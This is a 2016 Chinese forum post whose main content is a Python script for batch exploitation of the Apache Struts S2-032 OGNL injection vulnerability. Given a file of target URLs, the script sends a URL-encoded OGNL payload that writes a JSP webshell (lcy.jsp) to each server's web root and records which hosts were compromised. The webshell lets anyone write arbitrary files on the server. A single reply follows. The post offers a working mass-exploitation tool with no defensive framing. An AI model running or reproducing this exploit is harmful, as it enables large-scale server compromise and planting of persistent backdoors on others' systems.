C4r1st 发表于 2016-4-26 20:44:38

S2-032批量getshell根目录生成小马

Struts S2-032

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-04-26 17:38:52
# @Last Modified by:   Lcy
# @Last Modified time: 2016-04-26 18:20:45
import requests
import sys
if len(sys.argv) < 2:
    print "Example: python exp.py list.txt"
    exit()
weblist = sys.argv
payload = "?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj,%23c%3d%23parameters.reqobj,%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj,%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content.getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=lcy.jsp&content=%3C%25@%20page%20language%3D%22java%22%20pageEncoding%3D%22gbk%22%25%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.File%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.OutputStream%22%2f%3E%3Cjsp%3Adirective.page%20import%3D%22java.io.FileOutputStream%22%2f%3E%3C%25%20int%20i%3D0%3BString%20method%3Drequest.getParameter%28%22act%22%29%3Bif%28method%21%3Dnull%26%26method.equals%28%22yoco%22%29%29%7BString%20url%3Drequest.getParameter%28%22url%22%29%3BString%20text%3Drequest.getParameter%28%22smart%22%29%3BFile%20f%3Dnew%20File%28url%29%3Bif%28f.exists%28%29%29%7Bf.delete%28%29%3B%7Dtry%7BOutputStream%20o%3Dnew%20FileOutputStream%28f%29%3Bo.write%28text.getBytes%28%29%29%3Bo.close%28%29%3B%7Dcatch%28Exception%20e%29%7Bi%2b%2b%3B%25%3E0%3C%25%7D%7Dif%28i%3D%3D0%29%7B%25%3E1%3C%25%7D%25%3E%3Cform%20action%3D%27%3Fact%3Dyoco%27%20method%3D%27post%27%3E%3Cinput%20size%3D%22100%22%20value%3D%22%3C%25%3Dapplication.getRealPath%28%22%2f%22%29%20%25%3E%22%20name%3D%22url%22%3E%3Cbr%3E%3Ctextarea%20rows%3D%2220%22%20cols%3D%2280%22%20name%3D%22smart%22%3E"
f = open(weblist)
for l in f.readlines():
    url = l.strip()+ payload
    try:
      r = requests.get(url,timeout=5)
      res = r.text
      if "lcy.jsp" in res:
            f = open("result.txt","a")
            f.write(l.strip()+ payload + "\r\n\r\n")
            print "\n %s Getshell Success!" % l.strip(),
    except:
      pass

No0d1es 发表于 2016-4-27 08:59:35

居然我是沙发,没人评论
页: [1]
查看完整版本: S2-032批量getshell根目录生成小马